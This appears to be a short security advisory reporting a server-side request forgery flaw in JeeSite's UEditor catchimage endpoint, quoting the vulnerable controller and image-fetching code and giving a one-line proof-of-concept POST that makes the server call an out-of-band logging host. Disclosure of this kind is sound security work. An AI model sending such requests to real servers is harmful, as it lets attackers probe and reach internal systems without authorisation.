SSRF vulnerability on /js/a/file/ueditor/catchimage

[NinjaGPT]

Summary

UEditor has an SSRF vulnerability, and this project is using the vulnerable version.

Details

• Taint Source:

src/main/java/com/jeesite/modules/file/web/UeditorController.java

@Controller
@RequestMapping(value = "${adminPath}/file/ueditor")
@ConditionalOnProperty(name={"file.enabled","web.core.enabled"}, havingValue="true", matchIfMissing=true)
public class UeditorController extends BaseController {

	@RequestMapping(value = "")
	@ResponseBody
	public String upload(HttpServletRequest request, HttpServletResponse response) {
		return upload(null, request, response);
	}

	@RequestMapping(value = "{action}")
	@ResponseBody
	public String upload(@PathVariable String action, HttpServletRequest request, HttpServletResponse response) {
		String rootPath = Global.getUserfilesBaseDir(null);
		return new ActionEnter(request, rootPath, action).exec();
	}

}

• Taint SInk:

src/main/java/com/jeesite/common/ueditor/hunter/ImageHunter.java

    public State captureRemoteData(String urlStr) {
        HttpURLConnection connection = null;
        URL url = null;
        String suffix = null;
        try {
            url = new URL(urlStr);
            if (!validHost(url.getHost())) {
                return new BaseState(false, AppInfo.PREVENT_HOST);
            }
            connection = (HttpURLConnection) url.openConnection();
            connection.setInstanceFollowRedirects(true);
            connection.setUseCaches(true);

POC

http://127.0.0.1:8980/js/a/file/ueditor/catchimage?fieldName=source
POST
source[]=http://dnslog

Impact

https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks

[think-gem]

1c5e49b